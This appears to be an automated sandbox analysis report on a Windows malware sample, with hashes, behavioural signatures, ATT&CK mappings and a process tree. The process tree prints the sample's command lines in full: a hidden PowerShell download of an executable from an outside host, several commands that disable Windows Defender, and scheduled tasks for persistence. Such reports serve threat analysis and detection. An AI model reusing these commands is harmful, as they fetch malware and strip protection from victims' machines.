Analysis
-
max time kernel
135s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 05:52
Static task
static1
Behavioral task
behavioral1
Sample
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
Resource
win7-20240729-en
General
-
Target
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
-
Size
126KB
-
MD5
7176b040816932541eb9c2b91d90b29b
-
SHA1
137a9c4620366caff2a1d1c297b6ae8c6d28761d
-
SHA256
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
-
SHA512
1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
-
SSDEEP
3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn
Malware Config
Extracted
https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 5 3060 powershell.exe 6 3060 powershell.exe 8 2512 powershell.exe 9 2512 powershell.exe 11 2168 powershell.exe 12 2168 powershell.exe 14 2692 powershell.exe 15 2692 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 3060 powershell.exe 2512 powershell.exe 2168 powershell.exe 2692 powershell.exe 2864 powershell.exe 2596 powershell.exe 1640 powershell.exe 316 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1044 db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe 2256 db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe 2788 db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe -
Loads dropped DLL 1 IoCs
pid Process 2720 taskeng.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2676 sc.exe 1080 sc.exe 648 sc.exe 2724 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2704 schtasks.exe 2652 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2596 powershell.exe 3060 powershell.exe 1640 powershell.exe 2512 powershell.exe 316 powershell.exe 2168 powershell.exe 2864 powershell.exe 2692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 2512 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2116 wrote to memory of 2880 2116 db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe 29 PID 2116 wrote to memory of 2880 2116 db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe 29 PID 2116 wrote to memory of 2880 2116 db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe 29 PID 2880 wrote to memory of 2596 2880 cmd.exe 31 PID 2880 wrote to memory of 2596 2880 cmd.exe 31 PID 2880 wrote to memory of 2596 2880 cmd.exe 31 PID 2880 wrote to memory of 3060 2880 cmd.exe 32 PID 2880 wrote to memory of 3060 2880 cmd.exe 32 PID 2880 wrote to memory of 3060 2880 cmd.exe 32 PID 2880 wrote to memory of 2796 2880 cmd.exe 33 PID 2880 wrote to memory of 2796 2880 cmd.exe 33 PID 2880 wrote to memory of 2796 2880 cmd.exe 33 PID 2880 wrote to memory of 2828 2880 cmd.exe 34 PID 2880 wrote to memory of 2828 2880 cmd.exe 34 PID 2880 wrote to memory of 2828 2880 cmd.exe 34 PID 2880 wrote to memory of 2704 2880 cmd.exe 35 PID 2880 wrote to memory of 2704 2880 cmd.exe 35 PID 2880 wrote to memory of 2704 2880 cmd.exe 35 PID 2880 wrote to memory of 1976 2880 cmd.exe 36 PID 2880 wrote to memory of 1976 2880 cmd.exe 36 PID 2880 wrote to memory of 1976 2880 cmd.exe 36 PID 2880 wrote to memory of 2652 2880 cmd.exe 37 PID 2880 wrote to memory of 2652 2880 cmd.exe 37 PID 2880 wrote to memory of 2652 2880 cmd.exe 37 PID 2880 wrote to memory of 2676 2880 cmd.exe 38 PID 2880 wrote to memory of 2676 2880 cmd.exe 38 PID 2880 wrote to memory of 2676 2880 cmd.exe 38 PID 2880 wrote to memory of 2708 2880 cmd.exe 39 PID 2880 wrote to memory of 2708 2880 cmd.exe 39 PID 2880 wrote to memory of 2708 2880 cmd.exe 39 PID 2708 wrote to memory of 2736 2708 net.exe 40 PID 2708 wrote to memory of 2736 2708 net.exe 40 PID 2708 wrote to memory of 2736 2708 net.exe 40 PID 2880 wrote to memory of 2780 2880 cmd.exe 41 PID 2880 wrote to memory of 2780 2880 cmd.exe 41 PID 2880 wrote to memory of 2780 2880 cmd.exe 41 PID 2880 wrote to memory of 1084 2880 cmd.exe 42 PID 2880 wrote to memory of 1084 2880 cmd.exe 42 PID 2880 wrote to memory of 1084 2880 cmd.exe 42 PID 2720 wrote to memory of 1044 2720 taskeng.exe 44 PID 2720 wrote to memory of 1044 2720 taskeng.exe 44 PID 2720 wrote to memory of 1044 2720 taskeng.exe 44 PID 1044 wrote to memory of 2332 1044 db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe 45 PID 1044 wrote to memory of 2332 1044 db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe 45 PID 1044 wrote to memory of 2332 1044 db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe 45 PID 2332 wrote to memory of 1640 2332 cmd.exe 47 PID 2332 wrote to memory of 1640 2332 cmd.exe 47 PID 2332 wrote to memory of 1640 2332 cmd.exe 47 PID 2332 wrote to memory of 2512 2332 cmd.exe 48 PID 2332 wrote to memory of 2512 2332 cmd.exe 48 PID 2332 wrote to memory of 2512 2332 cmd.exe 48 PID 2332 wrote to memory of 1916 2332 cmd.exe 49 PID 2332 wrote to memory of 1916 2332 cmd.exe 49 PID 2332 wrote to memory of 1916 2332 cmd.exe 49 PID 2332 wrote to memory of 1528 2332 cmd.exe 50 PID 2332 wrote to memory of 1528 2332 cmd.exe 50 PID 2332 wrote to memory of 1528 2332 cmd.exe 50 PID 2332 wrote to memory of 840 2332 cmd.exe 51 PID 2332 wrote to memory of 840 2332 cmd.exe 51 PID 2332 wrote to memory of 840 2332 cmd.exe 51 PID 2332 wrote to memory of 1080 2332 cmd.exe 52 PID 2332 wrote to memory of 1080 2332 cmd.exe 52 PID 2332 wrote to memory of 1080 2332 cmd.exe 52 PID 2332 wrote to memory of 1436 2332 cmd.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 2796 attrib.exe 1916 attrib.exe 1328 attrib.exe 2668 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\37A.tmp\37B.tmp\37C.bat C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"3⤵
- Views/modifies file attributes
PID:2796
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵PID:2828
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe" /sc onlogon /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2704
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵PID:1976
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe" /sc minute /mo 1 /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2652
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2676
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2736
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2780
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1084
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {654DB60A-64BE-4E37-807F-DDC47E1092ED} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2E03.tmp\2E04.tmp\2E05.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"4⤵
- Views/modifies file attributes
PID:1916
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"4⤵PID:1528
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"4⤵PID:840
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:1080
-
-
C:\Windows\system32\net.exenet stop WinDefend4⤵PID:1436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend5⤵PID:2640
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:2060
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2524
-
-
-
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe2⤵
- Executes dropped EXE
PID:2256 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\17D4.tmp\17D5.tmp\17D6.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"3⤵PID:2180
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"4⤵
- Views/modifies file attributes
PID:1328
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"4⤵PID:1652
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"4⤵PID:1008
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:648
-
-
C:\Windows\system32\net.exenet stop WinDefend4⤵PID:2600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend5⤵PID:836
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:2020
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1224
-
-
-
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe2⤵
- Executes dropped EXE
PID:2788 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\232.tmp\233.tmp\234.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"3⤵PID:2336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"4⤵
- Views/modifies file attributes
PID:2668
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"4⤵PID:2652
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"4⤵PID:2676
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:2724
-
-
C:\Windows\system32\net.exenet stop WinDefend4⤵PID:2780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend5⤵PID:1084
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:3016
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2384
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5c0e9bc2dfff6e08df8196809b9bbf253
SHA1006e88ea359145c40a6bbca55e6f21b387999255
SHA25643c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11
SHA5125b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
Filesize126KB
MD57176b040816932541eb9c2b91d90b29b
SHA1137a9c4620366caff2a1d1c297b6ae8c6d28761d
SHA256db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
SHA5121332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OAWB67LHDJBAR1XIZ8ZA.temp
Filesize7KB
MD5eeee14ba7f4805b9d1c43062fecd924b
SHA1c4aa8f1ea903bf36464dfddfa5a1509e7d3037d7
SHA25650ca8d636e9a6558bad945d555c8a538b98cacff82f0d87f980ad68d3ce6180f
SHA5124d21a27de46896d4380e51820086f75f8abc4fd616d70c0f8ea730aaea50c5e303c4d9bfdfc8b72924a13350625c7db665027ac092b1cde58c1a2a70e764420a